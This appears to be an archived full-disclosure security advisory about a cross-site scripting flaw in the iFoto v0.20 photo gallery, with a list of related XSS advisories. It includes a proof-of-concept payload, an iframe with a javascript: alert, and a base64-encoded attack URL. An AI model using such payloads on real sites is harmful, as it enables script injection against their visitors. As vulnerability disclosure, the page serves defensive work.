Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [Full-disclosure] ASPListPics [Kil13r-SA-20060609-3] DreamWiz Search Cross-Site Scripting Vulnerability [Kil13r-SA-20060609-2] DaNaWa Search Cross-Site Scripting Vulnerability [Kil13r-SA-20060609-1] Daum Search Cross-Site Scripting Vulnerability From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com> Date:10.06.2006Subject:iFoto v0.20-06/06/06iFoto v0.20-06/06/06 Homepage: http://ifoto.ireans.com/ Effected files: XSS Vulnerability: The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64. The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME] http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcn QoJ1hTUycpOyI+PC9JRlJBTUU+
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[Full-disclosure] ASPListPics
[Kil13r-SA-20060609-3] DreamWiz Search Cross-Site Scripting Vulnerability
[Kil13r-SA-20060609-2] DaNaWa Search Cross-Site Scripting Vulnerability
[Kil13r-SA-20060609-1] Daum Search Cross-Site Scripting Vulnerability
